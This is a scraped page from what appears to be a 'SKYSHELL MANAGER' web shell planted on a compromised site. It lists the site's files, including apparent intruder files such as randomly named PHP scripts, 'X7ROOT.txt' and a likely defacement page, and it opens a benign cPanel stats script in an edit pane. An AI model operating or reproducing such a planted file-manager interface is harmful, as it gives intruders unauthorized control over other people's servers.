📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: stats-expander.js
// build a progress bar for a div, only builds if the element contains elements with classnames "stats_progress_bar_percent" and "stats_progress_bar_text" var build_progress_bar = function(el) { var percent_el = YAHOO.util.Dom.getElementsByClassName("cpanel_widget_progress_bar_percent", "div", el); for (var i in percent_el) { if (percent_el.hasOwnProperty(i)) { var elt = percent_el[i]; if ("innerHTML" in elt) { var percent = YAHOO.lang.trim(elt.innerHTML); if (CPANEL.validate.positive_integer(percent)) { CPANEL.widgets.progress_bar(el, percent, "", '{"inverse_colors":"true"}'); } } } } }; // build the progress bars on the page var build_progress_bars = function(root_el) { // find all the elements with class "stats_progress_bar" in the root_el element and builds their progress bar(s) YAHOO.util.Dom.getElementsByClassName("stats_progress_bar", "div", root_el, build_progress_bar); }; // destroy progress bars (needed for ie animation bug) var destroy_progress_bars = function(root_el) { YAHOO.util.Dom.getElementsByClassName("cpanel_widget_progress_bar", "div", root_el, function(el) { YAHOO.util.Dom.get(el).innerHTML = ""; }); }; // grab the extended stats with an AJAX call var fetch_extended_stats = function() { // show the loading icon YAHOO.util.Dom.setStyle("toggle_extended_stats", "display", "none"); YAHOO.util.Dom.setStyle("extended_stats_loading_icon", "display", "block"); YAHOO.util.Dom.get("extended_stats_loading_icon").innerHTML = CPANEL.icons.ajax + " loading..."; // create the callback functions var callback = { success: function(o) { YAHOO.util.Dom.get("extended_stats").innerHTML = o.responseText; /* disabled per case 32783: now done on the backend CPANEL.util.zebra(["stats", "extended_stats"], "info-even", "info-odd"); */ build_progress_bars("stats_extended"); expand_extended_stats(); }, failure: function(o) { YAHOO.util.Dom.get("extended_stats_loading_icon").innerHTML = ""; YAHOO.util.Dom.setStyle("toggle_extended_stats", "display", "block"); YAHOO.util.Dom.get("toggle_extended_stats").innerHTML = "AJAX Failure: click to try again"; }, timeout: 3000 }; // send the AJAX request YAHOO.util.Connect.asyncRequest("GET", "home/retro/extended_statsbar.html?secpolicy_ui=no", callback, null); }; // function to run after the expand animation has finished var finish_expand_extended_stats = function() { // build the progress bars in IE (trailing animation bug) if (YAHOO.env.ua.ie > 5 && YAHOO.env.ua.ie < 8) { build_progress_bars("stats_extended"); } // update the toggle text YAHOO.util.Dom.get("toggle_extended_stats").innerHTML = "Collapse Stats"; YAHOO.util.Dom.setStyle("toggle_extended_stats", "display", ""); YAHOO.util.Dom.setStyle("extended_stats_loading_icon", "display", "none"); // swap the up/down arrow YAHOO.util.Dom.replaceClass("toggle_extended_stats_img", "box-expand-control", "box-collapse-control"); // clear the height style attribute on the extended_stats area YAHOO.util.Dom.setStyle("extended_stats", "height", "100%"); // set the state to shown YAHOO.util.Dom.get("extended_stats_state").innerHTML = "shown"; }; // function that starts the expand animation var expand_extended_stats = function() { // set the state to animating YAHOO.util.Dom.get("extended_stats_state").innerHTML = "animating"; // hide the loading icon YAHOO.util.Dom.get("toggle_extended_stats").innerHTML = ""; // start the show animation var auto_height = CPANEL.animate.getAutoHeight("extended_stats"); YAHOO.util.Dom.setStyle("extended_stats", "height", "0px"); YAHOO.util.Dom.setStyle("extended_stats", "display", "block"); var attributes = { height: { to: auto_height, units: "px" } }; var anim = new YAHOO.util.Anim("extended_stats", attributes, "0.5", YAHOO.util.Easing.easeOutStrong); anim.onComplete.subscribe(finish_expand_extended_stats); anim.animate(); }; // function to run after the hide animation has finished var finish_hide_extended_stats = function() { // update the toggle text YAHOO.util.Dom.get("toggle_extended_stats").innerHTML = "Expand Stats"; // swap the up/down arrow YAHOO.util.Dom.replaceClass("toggle_extended_stats_img", "box-collapse-control", "box-expand-control"); // set the state to hidden YAHOO.util.Dom.get("extended_stats_state").innerHTML = "hidden"; }; // function to start the hide animation var hide_extended_stats = function() { // destroy the progress bars in IE (trailing animation bug) if (YAHOO.env.ua.ie > 5 && YAHOO.env.ua.ie < 8) { destroy_progress_bars("extended_stats"); } // set the state to animating YAHOO.util.Dom.get("extended_stats_state").innerHTML = "animating"; // hide toggle text YAHOO.util.Dom.get("toggle_extended_stats").innerHTML = ""; // begin the hide animation var attributes = { height: { to: "0", units: "px" } }; var anim = new YAHOO.util.Anim("extended_stats", attributes, "0.5", YAHOO.util.Easing.easeOutStrong); anim.onComplete.subscribe(finish_hide_extended_stats); anim.animate(); }; // toggle extended stats expansion/hide var toggle_extended_stats = function() { YAHOO.util.Dom.get("toggle_extended_stats").blur(); var state = YAHOO.util.Dom.get("extended_stats_state").innerHTML; state = YAHOO.lang.trim(state); if (state == "hidden") { if (YAHOO.lang.trim(YAHOO.util.Dom.get("extended_stats").innerHTML) == "") { fetch_extended_stats(); } else { expand_extended_stats(); } // set the environment variable SetNvData("xstatscollapsed", "expanded"); } else if (state == "shown") { hide_extended_stats(); // set the environment variable SetNvData("xstatscollapsed", "collapsed"); } }; // omDOMReady function var init_extended_stats = function() { // disable the expand/collapse links if JS is enabled YAHOO.util.Event.on("toggle_extended_stats", "click", function(e) { YAHOO.util.Event.preventDefault(e); }); // add event handlers to toggle extended stats YAHOO.util.Event.on(["toggle_extended_stats", "stats-header"], "click", toggle_extended_stats); // build all progress bars in the main stats build_progress_bars("content-stats"); // set the initial state of extended stats register_interfacecfg_nvdata("xstatscollapsed"); if (NVData["xstatscollapsed"] == "expanded" && YAHOO.lang.trim(YAHOO.util.Dom.get("extended_stats").innerHTML) == "") { fetch_extended_stats(); } /* disabled per case 32783: now done on the backend zebra-stripe the rows CPANEL.util.zebra(["stats", "extended_stats"], "info-even", "info-odd"); */ };
Save